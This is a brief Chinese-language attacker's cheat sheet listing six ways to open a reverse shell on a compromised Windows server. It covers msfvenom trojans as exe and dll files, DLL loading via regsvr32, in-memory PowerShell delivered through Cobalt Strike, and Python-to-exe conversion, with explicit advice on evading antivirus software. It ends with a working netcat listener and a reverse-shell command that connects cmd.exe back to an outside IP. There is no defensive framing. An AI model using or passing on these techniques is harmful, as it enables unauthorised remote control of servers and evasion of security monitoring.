一、運行exe程序反彈shell
需要先生成exe木馬,然后將exe文件上傳到服務器上,最后在服務器上運行該文件。可使用msfvenom生成exe木馬。
二、加載dll文件反彈shell
需要先生成dll文件,然后使用regsvr32.exe加載dll。可使用msfvenom生成dll文件。
三、PowerShell反彈shell
通過執行PowerShell代碼反彈shell能有效繞過殺毒軟件對攔截,因為通常將PowerShell代碼直接加載到內存中,不會在磁盤上創建任何惡意文件,所以能繞過殺軟的監控。可使用Cobalt Strike的Web腳本投遞功能反彈shell。
四、腳本語言反彈shell
可通過運行PHP、Python、Shell等腳本語言程序反彈shell。可使用msfvenom生成各種語言的腳本程序。
五、Python腳本轉換成exe反彈shell
將Python腳本轉換成exe程序能有效繞過殺毒軟件的檢測實現免殺。
六、netcat反彈shell
在VPS上監聽端口:netcat -l -p 443
在被控服務器上運行:netcat.exe -t -e cmd.exe 16.79.5.26 443
...